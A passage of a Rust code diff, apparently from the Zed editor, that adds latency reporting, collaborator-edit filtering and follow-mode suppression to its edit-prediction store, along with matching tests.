- .is_some_and(|last_edit_range| {
- lines_between_ranges(
- &edit_range.to_point(&new_snapshot),
- &last_edit_range.to_point(&new_snapshot),
- ) <= CHANGE_GROUPING_LINE_SPAN
- });
+ && lines_between_ranges(
+ &edit_range.to_point(&new_snapshot),
+ &last_event.latest_edit_range.to_point(&new_snapshot),
+ ) <= CHANGE_GROUPING_LINE_SPAN;
if should_coalesce {
let pause_elapsed = last_event
@@ -1339,9 +1457,13 @@ impl EditPredictionStore {
if pause_elapsed {
last_event.snapshot_after_last_editing_pause =
Some(last_event.new_snapshot.clone());
+ last_event.total_edit_range_at_last_pause_boundary =
+ Some(last_event.total_edit_range.clone());
}
- last_event.edit_range = Some(edit_range);
+ last_event.latest_edit_range = edit_range.clone();
+ last_event.total_edit_range =
+ merge_anchor_ranges(&last_event.total_edit_range, &edit_range, &new_snapshot);
last_event.new_snapshot = new_snapshot;
last_event.last_edit_time = Some(now);
return;
@@ -1364,7 +1486,9 @@ impl EditPredictionStore {
new_file,
old_snapshot,
new_snapshot,
- edit_range: Some(edit_range),
+ latest_edit_range: edit_range.clone(),
+ total_edit_range: edit_range,
+ total_edit_range_at_last_pause_boundary: None,
predicted: is_predicted,
snapshot_after_last_editing_pause: None,
last_edit_time: Some(now),
@@ -1420,7 +1544,13 @@ impl EditPredictionStore {
return;
};
- self.report_changes_for_buffer(¤t_prediction.prediction.buffer, project, true, cx);
+ self.report_changes_for_buffer(
+ ¤t_prediction.prediction.buffer,
+ project,
+ true,
+ true,
+ cx,
+ );
// can't hold &mut project_state ref across report_changes_for_buffer_call
let Some(project_state) = self.projects.get_mut(&project.entity_id()) else {
@@ -1583,6 +1713,7 @@ impl EditPredictionStore {
request_id = pending_prediction.request_id.0.clone(),
settled_editable_region,
example = pending_prediction.example.take(),
+ e2e_latency = pending_prediction.e2e_latency.as_millis(),
);
return false;
@@ -1612,6 +1743,7 @@ impl EditPredictionStore {
edited_buffer_snapshot: &BufferSnapshot,
editable_offset_range: Range<usize>,
example: Option<ExampleSpec>,
+ e2e_latency: std::time::Duration,
cx: &mut Context<Self>,
) {
let this = &mut *self;
@@ -1626,6 +1758,7 @@ impl EditPredictionStore {
editable_anchor_range: edited_buffer_snapshot
.anchor_range_around(editable_offset_range),
example,
+ e2e_latency,
enqueued_at: now,
last_edit_at: now,
});
@@ -1648,6 +1781,7 @@ impl EditPredictionStore {
reason,
prediction.was_shown,
model_version,
+ Some(prediction.e2e_latency),
cx,
);
}
@@ -1709,6 +1843,7 @@ impl EditPredictionStore {
reason: EditPredictionRejectReason,
was_shown: bool,
model_version: Option<String>,
+ e2e_latency: Option<std::time::Duration>,
cx: &App,
) {
match self.edit_prediction_model {
@@ -1732,6 +1867,7 @@ impl EditPredictionStore {
reason,
was_shown,
model_version,
+ e2e_latency_ms: e2e_latency.map(|latency| latency.as_millis()),
},
organization_id,
})
@@ -1809,6 +1945,10 @@ impl EditPredictionStore {
return;
}
+ if currently_following(&project, cx) {
+ return;
+ }
+
let Some(project_state) = self.projects.get_mut(&project.entity_id()) else {
return;
};
@@ -1901,6 +2041,7 @@ impl EditPredictionStore {
EditPredictionResult {
id: prediction_result.id,
prediction: Err(EditPredictionRejectReason::CurrentPreferred),
+ e2e_latency: prediction_result.e2e_latency,
}
},
PredictionRequestedBy::DiagnosticsUpdate,
@@ -1945,6 +2086,25 @@ impl EditPredictionStore {
pub const THROTTLE_TIMEOUT: Duration = Duration::from_millis(300);
}
+fn currently_following(project: &Entity<Project>, cx: &App) -> bool {
+ let Some(app_state) = AppState::try_global(cx).and_then(|app_state| app_state.upgrade()) else {
+ return false;
+ };
+
+ app_state
+ .workspace_store
+ .read(cx)
+ .workspaces()
+ .filter_map(|workspace| workspace.upgrade())
+ .any(|workspace| {
+ workspace.read(cx).project().entity_id() == project.entity_id()
+ && workspace
+ .read(cx)
+ .leader_for_pane(workspace.read(cx).active_pane())
+ .is_some()
+ })
+}
+
fn is_ep_store_provider(provider: EditPredictionProvider) -> bool {
match provider {
EditPredictionProvider::Zed
@@ -2014,11 +2174,12 @@ impl EditPredictionStore {
let project_state = this.get_or_init_project(&project, cx);
let throttle = *select_throttle(project_state, request_trigger);
+ let now = cx.background_executor().now();
throttle.and_then(|(last_entity, last_timestamp)| {
if throttle_entity != last_entity {
return None;
}
- (last_timestamp + throttle_timeout).checked_duration_since(Instant::now())
+ (last_timestamp + throttle_timeout).checked_duration_since(now)
})
})
.ok()
@@ -2046,7 +2207,7 @@ impl EditPredictionStore {
return;
}
- let new_refresh = (throttle_entity, Instant::now());
+ let new_refresh = (throttle_entity, cx.background_executor().now());
*select_throttle(project_state, request_trigger) = Some(new_refresh);
is_cancelled = false;
})
@@ -2079,6 +2240,7 @@ impl EditPredictionStore {
prediction,
was_shown: false,
shown_with: None,
+ e2e_latency: prediction_result.e2e_latency,
};
if let Some(current_prediction) =
@@ -2099,6 +2261,7 @@ impl EditPredictionStore {
EditPredictionRejectReason::CurrentPreferred,
false,
new_prediction.prediction.model_version,
+ Some(new_prediction.e2e_latency),
cx,
);
None
@@ -2113,6 +2276,7 @@ impl EditPredictionStore {
reject_reason,
false,
None,
+ Some(prediction_result.e2e_latency),
cx,
);
None
@@ -2147,18 +2311,24 @@ impl EditPredictionStore {
});
if project_state.pending_predictions.len() < max_pending_predictions {
- project_state.pending_predictions.push(PendingPrediction {
- id: pending_prediction_id,
- task,
- drop_on_cancel,
- });
+ project_state
+ .pending_predictions
+ .push(PendingPrediction {
+ id: pending_prediction_id,
+ task,
+ drop_on_cancel,
+ })
+ .unwrap();
} else {
let pending_prediction = project_state.pending_predictions.pop().unwrap();
- project_state.pending_predictions.push(PendingPrediction {
- id: pending_prediction_id,
- task,
- drop_on_cancel,
- });
+ project_state
+ .pending_predictions
+ .push(PendingPrediction {
+ id: pending_prediction_id,
+ task,
+ drop_on_cancel,
+ })
+ .unwrap();
project_state.cancel_pending_prediction(pending_prediction, cx);
}
}
@@ -2605,8 +2775,8 @@ impl EditPredictionStore {
self.data_collection_choice.is_enabled(cx)
}
- fn load_data_collection_choice() -> DataCollectionChoice {
- let choice = KEY_VALUE_STORE
+ fn load_data_collection_choice(cx: &App) -> DataCollectionChoice {
+ let choice = KeyValueStore::global(cx)
.read_kvp(ZED_PREDICT_DATA_COLLECTION_CHOICE)
.log_err()
.flatten();
@@ -2626,11 +2796,13 @@ impl EditPredictionStore {
self.data_collection_choice = self.data_collection_choice.toggle();
let new_choice = self.data_collection_choice;
let is_enabled = new_choice.is_enabled(cx);
- db::write_and_log(cx, move || {
- KEY_VALUE_STORE.write_kvp(
+ let kvp = KeyValueStore::global(cx);
+ db::write_and_log(cx, move || async move {
+ kvp.write_kvp(
ZED_PREDICT_DATA_COLLECTION_CHOICE.into(),
is_enabled.to_string(),
)
+ .await
});
}
@@ -2689,6 +2861,32 @@ impl EditPredictionStore {
}
}
+fn collaborator_edit_overlaps_locality_region(
+ project_state: &ProjectState,
+ project: &Entity<Project>,
+ buffer: &Entity<Buffer>,
+ snapshot: &BufferSnapshot,
+ edit_range: &Range<Anchor>,
+ cx: &App,
+) -> bool {
+ let Some((active_buffer, Some(position))) = project_state.active_buffer(project, cx) else {
+ return false;
+ };
+
+ if active_buffer.entity_id() != buffer.entity_id() {
+ return false;
+ }
+
+ let locality_point_range = expand_context_syntactically_then_linewise(
+ snapshot,
+ (position..position).to_point(snapshot),
+ COLLABORATOR_EDIT_LOCALITY_CONTEXT_TOKENS,
+ );
+ let locality_anchor_range = snapshot.anchor_range_around(locality_point_range);
+
+ edit_range.overlaps(&locality_anchor_range, snapshot)
+}
+
fn merge_trailing_events_if_needed(
events: &mut VecDeque<StoredEvent>,
end_snapshot: &TextBufferSnapshot,
@@ -2699,13 +2897,19 @@ fn merge_trailing_events_if_needed(
if last_event.old_snapshot.remote_id() != latest_snapshot.remote_id() {
return;
}
+ if !latest_snapshot
+ .version
+ .observed_all(&last_event.new_snapshot_version)
+ {
+ return;
+ }
}
let mut next_old_event = None;
let mut mergeable_count = 0;
for old_event in events.iter().rev() {
- if let Some(next_old_event) = &next_old_event
- && !old_event.can_merge(&next_old_event, latest_snapshot, latest_edit_range)
+ if let Some(next_old_event) = next_old_event
+ && !old_event.can_merge(next_old_event, latest_snapshot, latest_edit_range)
{
break;
}
@@ -2720,10 +2924,19 @@ fn merge_trailing_events_if_needed(
let mut events_to_merge = events.range(events.len() - mergeable_count..).peekable();
let oldest_event = events_to_merge.peek().unwrap();
let oldest_snapshot = oldest_event.old_snapshot.clone();
+ let newest_snapshot = end_snapshot;
+ let mut merged_edit_range = oldest_event.total_edit_range.clone();
- if let Some((diff, edited_range)) =
- compute_diff_between_snapshots(&oldest_snapshot, end_snapshot)
- {
+ for event in events.range(events.len() - mergeable_count + 1..) {
+ merged_edit_range =
+ merge_anchor_ranges(&merged_edit_range, &event.total_edit_range, latest_snapshot);
+ }
+
+ if let Some((diff, edit_range)) = compute_diff_between_snapshots_in_range(
+ &oldest_snapshot,
+ newest_snapshot,
+ &merged_edit_range,
+ ) {
let merged_event = match oldest_event.event.as_ref() {
zeta_prompt::Event::BufferChange {
old_path,
@@ -2747,8 +2960,9 @@ fn merge_trailing_events_if_needed(
}),
}),
old_snapshot: oldest_snapshot.clone(),
- edit_range: end_snapshot.anchor_before(edited_range.start)
- ..end_snapshot.anchor_before(edited_range.end),
+ new_snapshot_version: newest_snapshot.version.clone(),
+ total_edit_range: newest_snapshot.anchor_before(edit_range.start)
+ ..newest_snapshot.anchor_before(edit_range.end),
},
};
events.truncate(events.len() - mergeable_count);
@@ -2756,6 +2970,24 @@ fn merge_trailing_events_if_needed(
}
}
+fn merge_anchor_ranges(
+ left: &Range<Anchor>,
+ right: &Range<Anchor>,
+ snapshot: &TextBufferSnapshot,
+) -> Range<Anchor> {
+ let start = if left.start.cmp(&right.start, snapshot).is_le() {
+ left.start
+ } else {
+ right.start
+ };
+ let end = if left.end.cmp(&right.end, snapshot).is_ge() {
+ left.end
+ } else {
+ right.end
+ };
+ start..end
+}
+
#[derive(Error, Debug)]
#[error(
"You must update to Zed version {minimum_version} or higher to continue using edit predictions."
@@ -2806,12 +3038,13 @@ struct ZedPredictUpsell;
impl Dismissable for ZedPredictUpsell {
const KEY: &'static str = "dismissed-edit-predict-upsell";
- fn dismissed() -> bool {
+ fn dismissed(cx: &App) -> bool {
// To make this backwards compatible with older versions of Zed, we
// check if the user has seen the previous Edit Prediction Onboarding
// before, by checking the data collection choice which was written to
// the database once the user clicked on "Accept and Enable"
- if KEY_VALUE_STORE
+ let kvp = KeyValueStore::global(cx);
+ if kvp
.read_kvp(ZED_PREDICT_DATA_COLLECTION_CHOICE)
.log_err()
.is_some_and(|s| s.is_some())
@@ -2819,15 +3052,14 @@ impl Dismissable for ZedPredictUpsell {
return true;
}
- KEY_VALUE_STORE
- .read_kvp(Self::KEY)
+ kvp.read_kvp(Self::KEY)
.log_err()
.is_some_and(|s| s.is_some())
}
}
-pub fn should_show_upsell_modal() -> bool {
- !ZedPredictUpsell::dismissed()
+pub fn should_show_upsell_modal(cx: &App) -> bool {
+ !ZedPredictUpsell::dismissed(cx)
}
pub fn init(cx: &mut App) {
@@ -1,12 +1,14 @@
use super::*;
-use crate::{compute_diff_between_snapshots, udiff::apply_diff_to_string};
+use crate::udiff::apply_diff_to_string;
use client::{UserStore, test::FakeServer};
use clock::FakeSystemClock;
+use clock::ReplicaId;
use cloud_api_types::{CreateLlmTokenResponse, LlmToken};
use cloud_llm_client::{
EditPredictionRejectReason, EditPredictionRejection, RejectEditPredictionsBody,
predict_edits_v3::{PredictEditsV3Request, PredictEditsV3Response},
};
+
use futures::{
AsyncReadExt, FutureExt, StreamExt,
channel::{mpsc, oneshot},
@@ -18,26 +20,28 @@ use gpui::{
};
use indoc::indoc;
use language::{
- Anchor, Buffer, CursorShape, Diagnostic, DiagnosticEntry, DiagnosticSet, DiagnosticSeverity,
- Operation, Point, Selection, SelectionGoal,
+ Anchor, Buffer, Capability, CursorShape, Diagnostic, DiagnosticEntry, DiagnosticSet,
+ DiagnosticSeverity, Operation, Point, Selection, SelectionGoal,
};
+use language_model::RefreshLlmTokenListener;
use lsp::LanguageServerId;
use parking_lot::Mutex;
use pretty_assertions::{assert_eq, assert_matches};
use project::{FakeFs, Project};
use serde_json::json;
use settings::SettingsStore;
-use std::{path::Path, sync::Arc, time::Duration};
+use std::{ops::Range, path::Path, sync::Arc, time::Duration};
use util::{
path,
test::{TextRangeMarker, marked_text_ranges_by},
};
use uuid::Uuid;
+use workspace::{AppState, CollaboratorId, MultiWorkspace};
use zeta_prompt::ZetaPromptInput;
use crate::{
BufferEditPrediction, EDIT_PREDICTION_SETTLED_QUIESCENCE, EditPredictionId,
- EditPredictionStore, REJECT_REQUEST_DEBOUNCE,
+ EditPredictionJumpsFeatureFlag, EditPredictionStore, REJECT_REQUEST_DEBOUNCE,
};
#[gpui::test]
@@ -176,6 +180,172 @@ async fn test_current_state(cx: &mut TestAppContext) {
});
}
+#[gpui::test]
+async fn test_diagnostics_refresh_suppressed_while_following(cx: &mut TestAppContext) {
+ let (ep_store, mut requests) = init_test_with_fake_client(cx);
+
+ cx.update(|cx| {
+ cx.update_flags(
+ false,
+ vec![EditPredictionJumpsFeatureFlag::NAME.to_string()],
+ );
+ });
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "1.txt": "Hello!\nHow\nBye\n",
+ "2.txt": "Hola!\nComo\nAdios\n"
+ }),
+ )
+ .await;
+ let project = Project::test(fs, vec![path!("/root").as_ref()], cx).await;
+
+ let app_state = cx.update(|cx| {
+ let app_state = AppState::test(cx);
+ AppState::set_global(Arc::downgrade(&app_state), cx);
+ app_state
+ });
+
+ let multi_workspace =
+ cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = multi_workspace
+ .read_with(cx, |multi_workspace, _| multi_workspace.workspace().clone())
+ .unwrap();
+ cx.update(|cx| {
+ AppState::set_global(Arc::downgrade(workspace.read(cx).app_state()), cx);
+ });
+ let _ = app_state;
+
+ let buffer1 = project
+ .update(cx, |project, cx| {
+ let path = project.find_project_path(path!("root/1.txt"), cx).unwrap();
+ project.set_active_path(Some(path.clone()), cx);
+ project.open_buffer(path, cx)
+ })
+ .await
+ .unwrap();
+ let snapshot1 = buffer1.read_with(cx, |buffer, _cx| buffer.snapshot());
+ let position = snapshot1.anchor_before(language::Point::new(1, 3));
+
+ ep_store.update(cx, |ep_store, cx| {
+ ep_store.register_project(&project, cx);
+ ep_store.register_buffer(&buffer1, &project, cx);
+ ep_store.refresh_prediction_from_buffer(project.clone(), buffer1.clone(), position, cx);
+ });
+
+ let (request, respond_tx) = requests.predict.next().await.unwrap();
+ respond_tx
+ .send(model_response(
+ &request,
+ indoc! {r"
+ --- a/root/1.txt
+ +++ b/root/1.txt
+ @@ ... @@
+ Hello!
+ -How
+ +How are you?
+ Bye
+ "},
+ ))
+ .unwrap();
+ cx.run_until_parked();
+
+ ep_store.update(cx, |ep_store, cx| {
+ ep_store.reject_current_prediction(EditPredictionRejectReason::Discarded, &project, cx);
+ });
+
+ let _ = multi_workspace.update(cx, |multi_workspace, window, cx| {
+ multi_workspace.workspace().update(cx, |workspace, cx| {
+ workspace.start_following(CollaboratorId::Agent, window, cx);
+ });
+ });
+ cx.run_until_parked();
+
+ let diagnostic = lsp::Diagnostic {
+ range: lsp::Range::new(lsp::Position::new(1, 1), lsp::Position::new(1, 5)),
+ severity: Some(lsp::DiagnosticSeverity::ERROR),
+ message: "Sentence is incomplete".to_string(),
+ ..Default::default()
+ };
+
+ project.update(cx, |project, cx| {
+ project.lsp_store().update(cx, |lsp_store, cx| {
+ lsp_store
+ .update_diagnostics(
+ LanguageServerId(0),
+ lsp::PublishDiagnosticsParams {
+ uri: lsp::Uri::from_file_path(path!("/root/2.txt")).unwrap(),
+ diagnostics: vec![diagnostic.clone()],
+ version: None,
+ },
+ None,
+ language::DiagnosticSourceKind::Pushed,
+ &[],
+ cx,
+ )
+ .unwrap();
+ });
+ });
+
+ cx.run_until_parked();
+ assert_no_predict_request_ready(&mut requests.predict);
+
+ let _ = multi_workspace.update(cx, |multi_workspace, window, cx| {
+ multi_workspace.workspace().update(cx, |workspace, cx| {
+ workspace.unfollow(CollaboratorId::Agent, window, cx);
+ });
+ });
+ cx.run_until_parked();
+
+ project.update(cx, |project, cx| {
+ project.lsp_store().update(cx, |lsp_store, cx| {
+ lsp_store
+ .update_diagnostics(
+ LanguageServerId(0),
+ lsp::PublishDiagnosticsParams {
+ uri: lsp::Uri::from_file_path(path!("/root/2.txt")).unwrap(),
+ diagnostics: vec![diagnostic],
+ version: None,
+ },
+ None,
+ language::DiagnosticSourceKind::Pushed,
+ &[],
+ cx,
+ )
+ .unwrap();
+ });
+ });
+
+ let (request, respond_tx) = requests.predict.next().await.unwrap();
+ respond_tx
+ .send(model_response(
+ &request,
+ indoc! {r#"
+ --- a/root/2.txt
+ +++ b/root/2.txt
+ @@ ... @@
+ Hola!
+ -Como
+ +Como estas?
+ Adios
+ "#},
+ ))
+ .unwrap();
+ cx.run_until_parked();
+
+ ep_store.update(cx, |ep_store, cx| {
+ let prediction = ep_store
+ .prediction_at(&buffer1, None, &project, cx)
+ .unwrap();
+ assert_matches!(
+ prediction,
+ BufferEditPrediction::Jump { prediction } if prediction.snapshot.file().unwrap().full_path(cx) == Path::new(path!("root/2.txt"))
+ );
+ });
+}
+
#[gpui::test]
async fn test_simple_request(cx: &mut TestAppContext) {
let (ep_store, mut requests) = init_test_with_fake_client(cx);
@@ -369,6 +539,12 @@ async fn test_edit_history_getter_pause_splits_last_event(cx: &mut TestAppContex
ep_store.edit_history_for_project(&project, cx)
});
assert_eq!(events.len(), 2);
+
+ let first_total_edit_range = buffer.read_with(cx, |buffer, _| {
+ events[0].total_edit_range.to_point(&buffer.snapshot())
+ });
+ assert_eq!(first_total_edit_range, Point::new(1, 0)..Point::new(1, 3));
+
let zeta_prompt::Event::BufferChange { diff, .. } = events[0].event.as_ref();
assert_eq!(
diff.as_str(),
@@ -381,6 +557,11 @@ async fn test_edit_history_getter_pause_splits_last_event(cx: &mut TestAppContex
"}
);
+ let second_total_edit_range = buffer.read_with(cx, |buffer, _| {
+ events[1].total_edit_range.to_point(&buffer.snapshot())
+ });
+ assert_eq!(second_total_edit_range, Point::new(1, 3)..Point::new(1, 13));
+
let zeta_prompt::Event::BufferChange { diff, .. } = events[1].event.as_ref();
assert_eq!(
diff.as_str(),
@@ -597,6 +778,315 @@ fn render_events_with_predicted(events: &[StoredEvent]) -> Vec<String> {
.collect()
}
+fn make_collaborator_replica(
+ buffer: &Entity<Buffer>,
+ cx: &mut TestAppContext,
+) -> (Entity<Buffer>, clock::Global) {
+ let (state, version) =
+ buffer.read_with(cx, |buffer, _cx| (buffer.to_proto(_cx), buffer.version()));
+ let collaborator = cx.new(|_cx| {
+ Buffer::from_proto(ReplicaId::new(1), Capability::ReadWrite, state, None).unwrap()
+ });
+ (collaborator, version)
+}
+
+async fn apply_collaborator_edit(
+ collaborator: &Entity<Buffer>,
+ buffer: &Entity<Buffer>,
+ since_version: &mut clock::Global,
+ edit_range: Range<usize>,
+ new_text: &str,
+ cx: &mut TestAppContext,
+) {
+ collaborator.update(cx, |collaborator, cx| {
+ collaborator.edit([(edit_range, new_text)], None, cx);
+ });
+
+ let serialize_task = collaborator.read_with(cx, |collaborator, cx| {
+ collaborator.serialize_ops(Some(since_version.clone()), cx)
+ });
+ let ops = serialize_task.await;
+ *since_version = collaborator.read_with(cx, |collaborator, _cx| collaborator.version());
+
+ buffer.update(cx, |buffer, cx| {
+ buffer.apply_ops(
+ ops.into_iter()
+ .map(|op| language::proto::deserialize_operation(op).unwrap()),
+ cx,
+ );
+ });
+}
+
+#[gpui::test]
+async fn test_nearby_collaborator_edits_are_kept_in_history(cx: &mut TestAppContext) {
+ let (ep_store, _requests) = init_test_with_fake_client(cx);
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "foo.rs": "line 0\nline 1\nline 2\nline 3\nline 4\nline 5\nline 6\nline 7\nline 8\nline 9\nline 10\nline 11\nline 12\nline 13\nline 14\n"
+ }),
+ )
+ .await;
+ let project = Project::test(fs, vec![path!("/root").as_ref()], cx).await;
+
+ let buffer = project
+ .update(cx, |project, cx| {
+ let path = project.find_project_path(path!("root/foo.rs"), cx).unwrap();
+ project.set_active_path(Some(path.clone()), cx);
+ project.open_buffer(path, cx)
+ })
+ .await
+ .unwrap();
+
+ let cursor = buffer.read_with(cx, |buffer, _cx| buffer.anchor_before(Point::new(1, 0)));
+
+ ep_store.update(cx, |ep_store, cx| {
+ ep_store.register_buffer(&buffer, &project, cx);
+ let _ = ep_store.prediction_at(&buffer, Some(cursor), &project, cx);
+ });
+
+ buffer.update(cx, |buffer, cx| {
+ buffer.edit(vec![(0..6, "LOCAL ZERO")], None, cx);
+ });
+
+ let (collaborator, mut collaborator_version) = make_collaborator_replica(&buffer, cx);
+
+ let (line_one_start, line_one_len) = collaborator.read_with(cx, |buffer, _cx| {
+ (Point::new(1, 0).to_offset(buffer), buffer.line_len(1))
+ });
+
+ apply_collaborator_edit(
+ &collaborator,
+ &buffer,
+ &mut collaborator_version,
+ line_one_start..line_one_start + line_one_len as usize,
+ "REMOTE ONE",
+ cx,
+ )
+ .await;
+
+ let events = ep_store.update(cx, |ep_store, cx| {
+ ep_store.edit_history_for_project(&project, cx)
+ });
+
+ assert_eq!(
+ render_events_with_predicted(&events),
+ vec![indoc! {"
+ manual
+ @@ -1,5 +1,5 @@
+ -line 0
+ -line 1
+ +LOCAL ZERO
+ +REMOTE ONE
+ line 2
+ line 3
+ line 4
+ "}]
+ );
+}
+
+#[gpui::test]
+async fn test_distant_collaborator_edits_are_omitted_from_history(cx: &mut TestAppContext) {
+ let (ep_store, _requests) = init_test_with_fake_client(cx);
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "foo.rs": (0..1000)
+ .map(|i| format!("line {i}\n"))
+ .collect::<String>()
+ }),
+ )
+ .await;
+ let project = Project::test(fs, vec![path!("/root").as_ref()], cx).await;
+
+ let buffer = project
+ .update(cx, |project, cx| {
+ let path = project.find_project_path(path!("root/foo.rs"), cx).unwrap();
+ project.set_active_path(Some(path.clone()), cx);
+ project.open_buffer(path, cx)
+ })
+ .await
+ .unwrap();
+
+ let cursor = buffer.read_with(cx, |buffer, _cx| buffer.anchor_before(Point::new(1, 0)));
+
+ ep_store.update(cx, |ep_store, cx| {
+ ep_store.register_buffer(&buffer, &project, cx);
+ let _ = ep_store.prediction_at(&buffer, Some(cursor), &project, cx);
+ });
+
+ buffer.update(cx, |buffer, cx| {
+ buffer.edit(vec![(0..6, "LOCAL ZERO")], None, cx);
+ });
+
+ let (collaborator, mut collaborator_version) = make_collaborator_replica(&buffer, cx);
+
+ let far_line_start = buffer.read_with(cx, |buffer, _cx| Point::new(900, 0).to_offset(buffer));
+
+ apply_collaborator_edit(
+ &collaborator,
+ &buffer,
+ &mut collaborator_version,
+ far_line_start..far_line_start + 7,
+ "REMOTE FAR",
+ cx,
+ )
+ .await;
+
+ let events = ep_store.update(cx, |ep_store, cx| {
+ ep_store.edit_history_for_project(&project, cx)
+ });
+
+ assert_eq!(
+ render_events_with_predicted(&events),
+ vec![indoc! {"
+ manual
+ @@ -1,4 +1,4 @@
+ -line 0
+ +LOCAL ZERO
+ line 1
+ line 2
+ line 3
+ "}]
+ );
+}
+
+#[gpui::test]
+async fn test_irrelevant_collaborator_edits_in_different_files_are_omitted_from_history(
+ cx: &mut TestAppContext,
+) {
+ let (ep_store, _requests) = init_test_with_fake_client(cx);
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "foo.rs": "line 0\nline 1\nline 2\nline 3\n",
+ "bar.rs": "line 0\nline 1\nline 2\nline 3\n"
+ }),
+ )
+ .await;
+ let project = Project::test(fs, vec![path!("/root").as_ref()], cx).await;
+
+ let foo_buffer = project
+ .update(cx, |project, cx| {
+ let path = project.find_project_path(path!("root/foo.rs"), cx).unwrap();
+ project.set_active_path(Some(path.clone()), cx);
+ project.open_buffer(path, cx)
+ })
+ .await
+ .unwrap();
+ let bar_buffer = project
+ .update(cx, |project, cx| {
+ let path = project.find_project_path(path!("root/bar.rs"), cx).unwrap();
+ project.open_buffer(path, cx)
+ })
+ .await
+ .unwrap();
+
+ let foo_cursor = foo_buffer.read_with(cx, |buffer, _cx| buffer.anchor_before(Point::new(1, 0)));
+
+ ep_store.update(cx, |ep_store, cx| {
+ ep_store.register_buffer(&foo_buffer, &project, cx);
+ ep_store.register_buffer(&bar_buffer, &project, cx);
+ let _ = ep_store.prediction_at(&foo_buffer, Some(foo_cursor), &project, cx);
+ });
+
+ let (bar_collaborator, mut bar_version) = make_collaborator_replica(&bar_buffer, cx);
+
+ apply_collaborator_edit(
+ &bar_collaborator,
+ &bar_buffer,
+ &mut bar_version,
+ 0..6,
+ "REMOTE BAR",
+ cx,
+ )
+ .await;
+
+ let events = ep_store.update(cx, |ep_store, cx| {
+ ep_store.edit_history_for_project(&project, cx)
+ });
+
+ assert!(events.is_empty());
+}
+
+#[gpui::test]
+async fn test_large_edits_are_omitted_from_history(cx: &mut TestAppContext) {
+ let (ep_store, _requests) = init_test_with_fake_client(cx);
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "foo.rs": (0..20)
+ .map(|i| format!("line {i}\n"))
+ .collect::<String>()
+ }),
+ )
+ .await;
+ let project = Project::test(fs, vec![path!("/root").as_ref()], cx).await;
+
+ let buffer = project
+ .update(cx, |project, cx| {
+ let path = project.find_project_path(path!("root/foo.rs"), cx).unwrap();
+ project.set_active_path(Some(path.clone()), cx);
+ project.open_buffer(path, cx)
+ })
+ .await
+ .unwrap();
+
+ let cursor = buffer.read_with(cx, |buffer, _cx| buffer.anchor_before(Point::new(1, 0)));
+
+ ep_store.update(cx, |ep_store, cx| {
+ ep_store.register_buffer(&buffer, &project, cx);
+ let _ = ep_store.prediction_at(&buffer, Some(cursor), &project, cx);
+ });
+
+ buffer.update(cx, |buffer, cx| {
+ buffer.edit(vec![(0..6, "LOCAL ZERO")], None, cx);
+ });
+
+ let (collaborator, mut collaborator_version) = make_collaborator_replica(&buffer, cx);
+
+ let (line_three_start, line_three_len) = collaborator.read_with(cx, |buffer, _cx| {
+ (Point::new(3, 0).to_offset(buffer), buffer.line_len(3))
+ });
+ let large_edit = "X".repeat(EDIT_HISTORY_DIFF_SIZE_LIMIT + 1);
+
+ apply_collaborator_edit(
+ &collaborator,
+ &buffer,
+ &mut collaborator_version,
+ line_three_start..line_three_start + line_three_len as usize,
+ &large_edit,
+ cx,
+ )
+ .await;
+
+ buffer.update(cx, |buffer, cx| {
+ let line_seven_start = Point::new(7, 0).to_offset(buffer);
+ let line_seven_end = Point::new(7, 6).to_offset(buffer);
+ buffer.edit(
+ vec![(line_seven_start..line_seven_end, "LOCAL SEVEN")],
+ None,
+ cx,
+ );
+ });
+
+ let events = ep_store.update(cx, |ep_store, cx| {
+ ep_store.edit_history_for_project(&project, cx)
+ });
+
+ let rendered_events = render_events_with_predicted(&events);
+
+ assert_eq!(rendered_events.len(), 2);
+ assert!(rendered_events[0].contains("+LOCAL ZERO"));
+ assert!(!rendered_events[0].contains(&large_edit));
+ assert!(rendered_events[1].contains("+LOCAL SEVEN"));
+ assert!(!rendered_events[1].contains(&large_edit));
+}
+
#[gpui::test]
async fn test_predicted_flag_coalescing(cx: &mut TestAppContext) {
let (ep_store, _requests) = init_test_with_fake_client(cx);
@@ -679,7 +1169,7 @@ async fn test_predicted_flag_coalescing(cx: &mut TestAppContext) {
let end = Point::new(2, 6).to_offset(buffer);
buffer.edit(vec![(offset..end, "LINE TWO")], None, cx);
});
- ep_store.report_changes_for_buffer(&buffer, &project, true, cx);
+ ep_store.report_changes_for_buffer(&buffer, &project, true, true, cx);
});
let events = ep_store.update(cx, |ep_store, cx| {
@@ -721,7 +1211,7 @@ async fn test_predicted_flag_coalescing(cx: &mut TestAppContext) {
let end = Point::new(3, 6).to_offset(buffer);
buffer.edit(vec![(offset..end, "LINE THREE")], None, cx);
});
- ep_store.report_changes_for_buffer(&buffer, &project, true, cx);
+ ep_store.report_changes_for_buffer(&buffer, &project, true, true, cx);
});
let events = ep_store.update(cx, |ep_store, cx| {
@@ -908,6 +1398,7 @@ async fn test_empty_prediction(cx: &mut TestAppContext) {
reason: EditPredictionRejectReason::Empty,
was_shown: false,
model_version: None,
+ e2e_latency_ms: Some(0),
}]
);
}
@@ -969,6 +1460,7 @@ async fn test_interpolated_empty(cx: &mut TestAppContext) {
reason: EditPredictionRejectReason::InterpolatedEmpty,
was_shown: false,
model_version: None,
+ e2e_latency_ms: Some(0),
}]
);
}
@@ -1062,6 +1554,7 @@ async fn test_replace_current(cx: &mut TestAppContext) {
reason: EditPredictionRejectReason::Replaced,
was_shown: false,
model_version: None,
+ e2e_latency_ms: Some(0),
}]
);
}
@@ -1157,6 +1650,7 @@ async fn test_current_preferred(cx: &mut TestAppContext) {
reason: EditPredictionRejectReason::CurrentPreferred,
was_shown: false,
model_version: None,
+ e2e_latency_ms: Some(0),
}]
);
}
@@ -1249,6 +1743,7 @@ async fn test_cancel_earlier_pending_requests(cx: &mut TestAppContext) {
reason: EditPredictionRejectReason::Canceled,
was_shown: false,
model_version: None,
+ e2e_latency_ms: None,
}]
);
}
@@ -1380,12 +1875,16 @@ async fn test_cancel_second_on_third_request(cx: &mut TestAppContext) {
reason: EditPredictionRejectReason::Canceled,
was_shown: false,
